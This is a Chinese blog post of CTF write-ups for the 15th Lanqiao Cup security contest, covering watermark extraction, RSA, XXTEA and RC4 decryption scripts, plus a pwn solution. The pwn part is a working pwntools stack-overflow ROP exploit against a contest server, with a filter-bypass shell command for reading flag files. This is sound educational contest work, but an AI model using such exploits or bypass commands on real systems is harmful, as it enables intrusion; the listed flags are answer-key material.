蓝桥杯 第十五届蓝桥杯大赛软件赛-网络安全赛项 题解

最新推荐文章于 2024-06-15 10:34:50 发布
最新推荐文章于 2024-06-15 10:34:50 发布
阅读量551 收藏 12
点赞数 7
分类专栏: CTF 文章标签: 蓝桥杯 web安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/firfis/article/details/138249615
版权

蓝桥杯 第十五届蓝桥杯大赛软件赛-网络安全赛项 题解

实力有限,解出了8题 凑活看吧

MISC

缺失的数据

拿压缩包中未加密的字典来爆破密码

密码爆破得到原图

在这里插入图片描述

import cv2
import numpy as np
import pywt


class WaterMarkDWT:
    def __init__(self, origin: str, watermark: str, key: int, weight: list):
        self.key = key
        self.img = cv2.imread(origin)
        self.mark = cv2.imread(watermark)
        self.coef = weight


    def arnold(self, img):
        r, c = img.shape
        p = np.zeros((r, c), np.uint8)

        a, b = 1, 1
        for k in range(self.key):
            for i in range(r):
                for j in range(c):
                    x = (i + b * j) % r
                    y = (a * i + (a * b + 1) * j) % c
                    p[x, y] = img[i, j]
        return p

    def deArnold(self, img):
        r, c = img.shape
        p = np.zeros((r, c), np.uint8)

        a, b = 1, 1
        for k in range(self.key):
            for i in range(r):
                for j in range(c):
                    x = ((a * b + 1) * i - b * j) % r
                    y = (-a * i + j) % c
                    p[x, y] = img[i, j]
        return p



    def get(self, size: tuple = (1200, 1200), flag: int = None):
        img = cv2.resize(self.img, size)

        img1 = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
        img2 = cv2.cvtColor(self.mark, cv2.COLOR_RGB2GRAY)

        c = pywt.wavedec2(img2, 'db2', level=3)

        [cl, (cH3, cV3, cD3), (cH2, cV2, cD2), (cH1, cV1, cD1)] = c

        d = pywt.wavedec2(img1, 'db2', level=3)
        [dl, (dH3, dV3, dD3), (dH2, dV2, dD2), (dH1, dV1, dD1)] = d

        a1, a2, a3, a4 = self.coef

        ca1 = (cl - dl) * a1
        ch1 = (cH3 - dH3) * a2
        cv1 = (cV3 - dV3) * a3
        cd1 = (cD3 - dD3) * a4

        waterImg = pywt.waverec2([ca1, (ch1, cv1, cd1)], 'db2')
        waterImg = np.array(waterImg, np.uint8)

        waterImg = self.deArnold(waterImg)

        kernel = np.ones((3, 3), np.uint8)
        if flag == 0:
            waterImg = cv2.erode(waterImg, kernel)
        elif flag == 1:
            waterImg = cv2.dilate(waterImg, kernel)

        cv2.imwrite('水印.png', waterImg)
        return waterImg


if __name__ == '__main__':
    # a.png 为原图
    img = 'a.png'
    # b.png 为带水印的图
    waterImg = 'b.png'
    k = 20
    xs = [0.2, 0.2, 0.5, 0.4]
    W1 = WaterMarkDWT(img, waterImg, k, xs).get()
    # 这里要调用get方法

注:pywt库的安装为:pip install PyWavelets

装好库运行一下就可以出flag图片了

在这里插入图片描述

flag是 flag{e642820a-44c0-4c7d-a259-68b15aca8840}

第一个是e 有点难看清。。。

packet

流量包乱翻一下就行,找http的流量

在这里插入图片描述

base64解一下就行

WEB

爬虫协议

访问 /robots.txt
在这里插入图片描述

访问下面那个长的就有flag了

CRYPTO

CC

CyberChef 一样的参数解一下

在这里插入图片描述

Theorem

根本就可以不用dp, dq 直接yafu分解就完事了

在这里插入图片描述

#coding=utf-8
import gmpy2
from Crypto.Util.number import long_to_bytes
n = 94581028682900113123648734937784634645486813867065294159875516514520556881461611966096883566806571691879115766917833117123695776131443081658364855087575006641022211136751071900710589699171982563753011439999297865781908255529833932820965169382130385236359802696280004495552191520878864368741633686036192501791
p = 9725277820345294029015692786209306694836079927617586357442724339468673996231042839233529246844794558371350733017150605931603344334330882328076640690156923
q = 9725277820345294029015692786209306694836079927617586357442724339468673996231042839233529246844794558371350733017150605931603344334330882328076640690156717
dq = 4218387668018915625720266396593862419917073471510522718205354605765842130260156168132376152403329034145938741283222306099114824746204800218811277063324566
dp = 9600627113582853774131075212313403348273644858279673841760714353580493485117716382652419880115319186763984899736188607228846934836782353387850747253170850
c = 36423517465893675519815622861961872192784685202298519340922692662559402449554596309518386263035128551037586034375613936036935256444185038640625700728791201299960866688949056632874866621825012134973285965672502404517179243752689740766636653543223559495428281042737266438408338914031484466542505299050233075829

phi = (p-1)*(q-1)
d = gmpy2.invert(65537,phi)
m = pow(c,d,n)
print(long_to_bytes(m))

# flag{5f00e1b9-2933-42ad-b4e1-069f6aa98e9a}

REVERSE

欢乐时光

IDA的插件可以识别到是TEA加密

在这里插入图片描述

跟进看一下就是xxtea的样子
在这里插入图片描述

Deltaround换一下就出来了

import struct  # line:3
import ctypes  # line:4


def MX(z, y, total, tea_key, p, e):  # line:7
    temp1 = (z.value >> 5 ^ y.value << 2) + (y.value >> 3 ^ z.value << 4)  # line:8
    temp2 = (total.value ^ y.value) + (tea_key[(p & 3) ^ e.value] ^ z.value)  # line:9
    return ctypes.c_uint32(temp1 ^ temp2)  # line:11


def decrypt(n, v, key):
    delta = 0x9E3779B9		# 要换成对应的  这就是 -1640531527
    rounds = 114 + 415 // n

    total = ctypes.c_uint32(rounds * delta)
    y = ctypes.c_uint32(v[0])
    e = ctypes.c_uint32(0)

    while rounds > 0:
        e.value = (total.value >> 2) & 3
        for p in range(n - 1, 0, -1):
            z = ctypes.c_uint32(v[p - 1])
            v[p] = ctypes.c_uint32((v[p] - MX(z, y, total, key, p, e).value)).value
            y.value = v[p]
        z = ctypes.c_uint32(v[n - 1])
        v[0] = ctypes.c_uint32(v[0] - MX(z, y, total, key, 0, e).value).value
        y.value = v[0]
        total.value -= delta
        rounds -= 1
    return v


enc = [0x480AC20C, 0xCE9037F2, 0x8C212018, 0x0E92A18D, 0xA4035274, 0x2473AAB1, 0xA9EFDB58, 0xA52CC5C8, 0xE432CB51, 0xD04E9223, 0x6FD07093]
key = [0x79696755, 0x67346F6C, 0x69231231, 0x5F674231]
res = encrypt_input = decrypt(11, enc, key)
for i in res:
    print(bytes.fromhex(str(hex(i)[2:]))[::-1].decode(), end='')
print()

# flag{efccf8f0-0c97-12ec-82e0-0c9d9242e335}
rc4

没啥可说的 rc4白送

from Crypto.Cipher import ARC4
import base64

def rc4_decrypt(data, key1):        # 解密
    data = base64.b64decode(data)
    key = bytes(key1, encoding='utf-8')
    enc = ARC4.new(key)
    res = enc.decrypt(data)
    res = str(res,'gbk')
    return res

if __name__ == "__main__":
    # data = 'nihao'  # 需要加密的内容
    enc = [0xB6, 0x42, 0xB7, 0xFC, 0xF0, 0xA2, 0x5E, 0xA9, 0x3D, 0x29, 0x36, 0x1F, 0x54, 0x29, 0x72, 0xA8, 0x63, 0x32, 0xF2, 0x44, 0x8B, 0x85, 0xEC, 0x0D, 0xAD, 0x3F, 0x93, 0xA3, 0x92, 0x74, 0x81, 0x65, 0x69, 0xEC, 0xE4, 0x39, 0x85, 0xA9, 0xCA, 0xAF, 0xB2, 0xC6]
    
    key = 'gamelab@'  # 加密key

    rc4 = ARC4.new(key.encode('utf-8'))
    res = rc4.decrypt(bytes(enc))
    print(res)

PWN

fd

栈溢出

第一个read放要执行的命令

第二个read去栈溢出,pop_rdibss 里的命令,在执行system

能命令执行后 还要绕过一下,再用重定向输入输出

执行这个命令就行 ca\\t f* 1>&0

from pwn import *
import sys

#p = process('./pwn')
p = remote("47.93.143.29", 21690)

# context.log_level = 'debug'
context.arch = 'amd64'

pop_rdi = 0x400933 
info = 0x601090
call_sys = 0x400778
offset = 40

cmd = b'ca\\t f* 1>&0'

p.sendlineafter('stack.\n', cmd)

payload = b'a' * offset + p64(pop_rdi) + p64(info) + p64(call_sys)

p.sendlineafter('...\n', payload)
p.interactive()

在这里插入图片描述

firfis
关注
  • 7
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
蓝桥杯网络安全组竞
weixin_61074128的博客
12-04 4513
综合应用考察选手的网络安全实战能力,将网安新兴技术,有缺陷单的环境,数据流量等转换为题供选手进行分析,没到题目通过预置漏洞的方式来验证选手威胁发现的专业能力。比过程中,选手将通过平台进行题信息的查看、附件下载、题环境下发等操作。选手获取题目后通过代码审计,资产收集,端口扫描,程序分析等形式,从题环境中获得遗传具有特定格式的字符串一般称为flag,将其提交给平台,从而获得该题分数。试题考查范围:包括但不限于,web漏洞挖掘与利用,操作系统安全,数据库安全,二进制程序逆向分析,代码审计,情报收集等。
蓝桥杯-网络安全(3)基础学习- JavaScript的闭包,网络安全内存优化面试
m0_61072670的博客
04-07 746
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
蓝桥杯网络安全春秋 Crypto RSA
m0_66467785的博客
06-05 3252
该公司以同一个N为模数,为Alice和Bob分别生成了不同的公钥和与之相应的私钥。Alice和Bob都使用自己的公钥对同一条明文m进行加密,分别得到密文c1和c2。假设你是一名密码安全研究者,你已获取了N值、两个密文和公钥,能否使用RSA的相关知识还原出明文m呢?根据扩展欧几里得算法,一定存在整数x, y使gcd(a, b) = ax + by。共模攻击是指用两个及以上的公钥(n, e)来加密同一条信息m。这道题与平常的共模攻击不太一样的就是e1是随机产生、未知的。根据题目提示,这是共模攻击。
2024蓝桥杯网络安全挑战部分wp
zwy3327078581的博客
04-27 1290
2024蓝桥杯网络安全挑战部分wp
2024年---蓝桥杯网络安全道部分WP
2201_75556700的博客
04-29 809
于是我接着用抓包工具,先开启代理,然后用bp抓包,抓到包之后,将robots.txt修改为790032299b331cf6758dced2433f74ab。6、点击 24853fafeb79aca39ffdcaaaaa9a621a这个文件,点开之后跳转到一个页面,得到flag。4、根据它的意思,我们可知output是真正的flag解码出来的,所以我们需要逆着它的过程来求出flag。2、用wireshark分析,看到了一个cat flag的字样。1、下载附件,打开是一个html。1、点开链接,页面提示。
第十五届蓝桥杯大赛软件-CB
06-03
第十五届蓝桥杯大赛软件_CB第十五届蓝桥杯大赛软件_CB第十五届蓝桥杯大赛软件_CB第十五届蓝桥杯大赛软件_CB第十五届蓝桥杯大赛软件_CB第十五届蓝桥杯大赛软件_CB第十五届蓝桥杯...
蓝桥杯第十一届省准备之历年真题.zip
02-15
为准备十一届蓝桥杯,我历经千辛万苦收集了部分历年的省真题。该试题集供南昌大学以及其他高等院校的同学下载使用,不收取任何积分!
资料源码-第十四届蓝桥杯Web 应用开发)第二次模拟题解.zip
01-24
大数据挑战、团体程序设计天梯、移动应用创新、网络技术挑战、全国大学生信息安全、“中国软件杯”大学生软件设计大赛、全国大学生光电设计竞、中国机器人及人工智能大赛、“大唐杯”全国大学生移动...
第14届蓝桥杯、国(B).pdf
06-07
以下是第十四届蓝桥杯、国的知识点总结: 编程语言 * C++:C++是一种高性能的编程语言,广泛应用于游戏开发、操作系统、浏览器等领域。蓝桥杯中,C++是主要的编程语言之一。 * PythonPython是一种易于...
第八届蓝桥杯大赛个人赛软件类)真题
11-12
蓝桥杯历届真题,包含所有大学A、B、C组,C/C++、java、python等所有语言,蓝桥杯大赛个人赛真题。
十五届蓝桥杯网络安全道部分题目wp
Hhhjf_的博客
04-28 796
对m进行十进制转16进制,得到666c61677b35663030653162392d323933332d343261642d623465312d3036396636616139386539617d。进行AES解密,gamelab@gamelab@作为key,点BAKE即可得到flag【使用工具:CyberChef】进根据提示为robots协议、在url后加/robots.txt,即可得到如下内容。【使用工具:轩禹_CTF_RSA工具】【使用工具:Wireshark】密码破解-Theorem。
第十五届蓝桥杯网络安全个人赛部分题解析1(详细)
m0_64426173的博客
05-01 713
第一步输入aes加密方法,第二步双击选择AES Decrypt模块(解密模块),也就是第二个,第三步输入key、IV值,题已经给出了,并且选择对应的编码方式UTF-8,选择加密模式CBC,这里注意,输入(input)要选择Hex(因为密文输出时为Hex),输出(output)为raw,第四步把密文放到输入大框框里,第五步点击处理,就会看到flag了。先ctrl+f搜索:flag,记不住快捷键可以点击编辑->查找分组,然后输入flag,前面选择字符串,直接回车,或者点击查找。
网络安全 第二届“金科网安杯”网络攻防大赛题总结
羊の博客
05-19 4526
第一次参加网络安全,发现自己是真的菜。 自己蒙对了俩个,一个brainfuck加密和一个肉眼就能看出来的解码= = 真的无语...俩个队友也是真的牛皮,前几天看都没看造就了今天的自我爆零。。 也许还没有打网络安全的觉悟吧 就跟我当时没有信心去打程序设计竞的心一样 需要去培养。 今天的痛苦又让我回忆起了当初打算法竞时的心境。 相对于算法竞 还有更重要的东西在等待着我:数据库、...
蓝桥杯十五届国模拟题1答案
Play_Sai的博客
06-11 919
蓝桥杯十五届国模拟题1的参考答案 参考解析
网络安全(补充)
m0_62207482的博客
06-11 1143
同步包风暴(SYN Flood)攻击者假造源网址发送多个同步数据包(SYN Packet)给服务器,服务器因无法收到确认数据包(ACK Packet),使TCP/IP协议三次握手无法顺利完成,因而无法建立连接。其原理是发送大量半连接状态的服务请求,使服务主机无法处理正常的连接请求,因而影响正常运作 泪滴攻击暴露出IP数据包分解与重组的弱点,当IP数据包在网络中传输时,会被分解成许多不同的包传送,并借由偏移量字段作为重组的依据。泪滴攻击通过加入过多或不必要的偏移量字段,使计算机系统重组错乱,产生不可预期的后
网络安全突发事件应急预案
最新发布
2301_76786857的博客
06-15 671
网络安全突发事件应急响应结束后,事发单位要及时调查突发事件的起因(包括直接原因和间接原因)、经过、责任,评估突发事件造成的影响和损失,总结突发事件防范和应急处置工作的经验教训,提出处理意见和改进措施,在应急响应结束后 10 个工作日内形成总结报告,报网安办。网安办汇总并研究后,在应急响应结束后 20 个工作日内形成报告,经领导小组批准,报部应急办。
十三届蓝桥杯题解
02-15
很抱歉,我无法提供十三届蓝桥杯题解的具体内容。蓝桥杯是中国最具影响力的计算机科学竞之一,每年都会吸引大量的参者。为了公平竞和保护知识产权,蓝桥杯题目和解答是保密的,只有参者在比期间才能获得。如果您对蓝桥杯感兴趣,我可以为您提供一些关于蓝桥杯的一般信息和参经验。如果您有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值